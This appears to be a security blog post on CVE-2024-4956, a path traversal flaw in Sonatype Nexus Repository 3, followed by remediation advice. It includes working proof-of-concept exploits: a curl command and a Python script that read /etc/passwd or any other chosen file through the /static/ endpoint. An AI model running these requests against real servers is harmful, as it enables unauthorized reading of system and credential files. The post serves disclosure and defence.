CVE-2024-4956 - Path Traversal in Sonatype Nexus Repository 3 Exposes Sensitive System Files (Exploit Included)

A new and dangerous vulnerability (CVE-2024-4956) has been discovered in Sonatype Nexus Repository 3, a tool used by thousands of organizations to manage software components. This security flaw allows *unauthenticated* attackers to read any file on the Nexus host machine by exploiting a path traversal bug – and worst of all, you don’t even need to log in.

The vulnerability is patched in version 3.68.1. If you're running anything lower, consider your secrets exposed.

This post explains how the exploit works, demonstrates a proof-of-concept, and gives practical mitigation advice. All code examples are for educational awareness.

What is Path Traversal?

Path traversal, or directory traversal, is a common security issue where an application fails to properly sanitize user-supplied paths. By sending special directory characters like ../, an attacker can access files and directories outside the intended folder.

In the case of Nexus Repository 3, a path traversal in a vulnerable API endpoint lets anyone fetch sensitive files, including:

- /etc/passwd (user list for Linux)

Technical Details

Sonatype Nexus exposes multiple REST APIs. CVE-2024-4956 exists in the handling of request paths. Suppose an endpoint allows downloading an artifact or asset, such as:

GET /repository/myrepo/assets/download/filename.zip

If the server fails to properly clean up the filename.zip parameter, an attacker can swap it with a traversal path to fetch arbitrary files, for example:

GET /repository/myrepo/assets/download/../../../etc/passwd

This walks up in the directory structure and pulls files from the server file system!

For CVE-2024-4956, a key affected endpoint is

/static/

But other endpoints could be vulnerable depending on instance customization.

Proof-of-Concept Exploit

Here’s a simple exploit using curl to fetch the contents of /etc/passwd from a vulnerable Nexus 3 instance:

curl http://nexus-server:8081/static/../../../../../../../../etc/passwd

Python PoC for Windows & Linux targets

import requests

# Change these
NEXUS_URL = "http://target-nexus:8081";
FILE_PATH = "../../../../../../../../etc/passwd"  # Replace with target file

url = f"{NEXUS_URL}/static/{FILE_PATH}"

resp = requests.get(url)
if resp.status_code == 200:
    print(f"[+] Success! File contents:\n{resp.text}")
else:
    print(f"[-] Failed: HTTP {resp.status_code}")

> NOTE: You may need to adjust the number of ../ segments depending on server directory structure.

Official Sonatype Advisory:

https://support.sonatype.com/hc/en-us/articles/35574230983835

NIST NVD (CVE entry):

https://nvd.nist.gov/vuln/detail/CVE-2024-4956

GitHub Security Advisory:

https://github.com/advisories/GHSA-g9x8-m8v5-2v9x

Remediation

PATCH IMMEDIATELY.
Upgrade to Nexus Repository 3.68.1 or later. This release fixes the path traversal bug.

- Download latest: https://help.sonatype.com/repomanager3/download
- Upgrade instructions: https://help.sonatype.com/repomanager3/upgrading

Block public and untrusted access to your Nexus server at the firewall level.

- Monitor logs for suspicious requests to /static/ and similar endpoints.

Conclusion

CVE-2024-4956 is easy to exploit and can expose sensitive files to anyone on the Internet if your Nexus server is open to the world. This is a critical issue – patch as fast as possible and check your logs for suspicious file accesses.

Timeline

Published on: 05/16/2024 16:15:10 UTC
Last modified on: 06/04/2024 17:53:05 UTC